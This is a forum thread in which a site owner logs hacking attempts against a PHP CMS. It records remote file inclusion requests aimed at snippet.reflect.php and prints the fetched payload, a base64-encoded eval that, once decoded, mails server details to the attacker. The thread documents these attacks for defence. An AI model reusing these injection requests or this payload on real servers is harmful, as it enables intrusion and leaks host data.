Basically any request except to your main index.php file gets redirected to /blackhole/index.php, which probably doesn’t even exist (or could be a single page that has a reproving or maybe just a silly "neener, neener, caught you!" type of message). Of course, it would also need to allow requests to images, css and js files.
-
- 2,877 Posts
-
- 2,877 Posts
-
- 2,877 Posts
-
- 2,877 Posts
[email protected] was fishing on my site!
WHOIS: 178.63.59.XXX - Hxxxxxx Online AG - DE - Germany
REQUEST: //assets/snippets/reflect/snippet.reflect.php?reflect_base=ht\tp://www.eurotechindia.org/portal/conf/1.txt??\?
CONTENT:
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
<?
eval(base64_decode("JGNyZWF0b3IgPSBiYXNlNjRfZGVjb2RlKCJZM3BpWlhKQWVXRm9iMjh1WTI5dCIpOw0KKCRzYWZlX21vZGUpPygkc2FmZW1vZGU9Ik9OIik6KCRzYWZlbW9kZT0iT0ZGIik7DQokYmFzZT0iaHR0cDovLyIuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddOyANCiRuYW1lID0gcGhwX3VuYW1lKCk7DQokaXAgPSBnZXRlbnYoIlJFTU9URV9BRERSIik7DQokaG9zdCA9IGdldGhvc3RieWFkZHIoJF9TRVJWRVJbUkVNT1RFX0FERFJdKTsNCiRzdWJqID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddOyANCiRtc2cgPSAiXG5CQVNFOiAkYmFzZVxudW5hbWUgLWE6ICRuYW1lXG5JUDogJGlwXG5Ib3N0OiAkaG9zdFxuJHB3ZHNcbiI7DQokZnJvbSA9IkZyb206IE1PREVfPSIuJHNhZmVtb2RlLiI8dG9vbEAiLiRfU0VSVkVSWydIVFRQX0hPU1QnXS4iPiI7DQptYWlsKCAkY3JlYXRvciwgJHN1YmosICRtc2csICRmcm9tKTs="));
?>
Decoding -
http://www.opinionatedgeek.com/dotnet/tools/base64decode/
CONTENT:
<?
$creator = base64_decode("Y3piZXJAeWFob28uY29t");
($safe_mode)?($safemode="ON"):($safemode="OFF");
$base="ht\tp://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$name = php_uname();
$ip = getenv("REMOTE_ADDR");
$host = gethostbyaddr($_SERVER[REMOTE_ADDR]);
$subj = $_SERVER['HTTP_HOST'];
$msg = "\nBASE: $base\nuname -a: $name\nIP: $ip\nHost: $host\n$pwds\n";
$from ="From: MODE_=".$safemode."<tool@".$_SERVER['HTTP_HOST'].">";
mail( $creator, $subj, $msg, $from);
?>
Decoding $creator = "
[email protected]"
He did receive an e-mail from me. But I was in charge of the content of that e-mail.
[ed. note: mrhaw last edited this post 12 years, 4 months ago.]
-
- 2,877 Posts
[email protected] (deleted by google at this time)
WHOIS: 203.81.175.XXX - MM (Myanmar) - Firefox
REQUEST: //assets/snippets/reflect/snippet.reflect.php?reflect_base=h\ttp://ygnutd.com/vnc/x/david.txt??
I always e-mail them:
1. How many sites do you hack per month?
2. Do you attack sites personally or just random.
3. Are you aware that by the info I have gathered you could be traced by police!?
And hope for answer. I haven't been lucky but others have got replies and had a dialogue.
[ed. note: mrhaw last edited this post 12 years, 3 months ago.]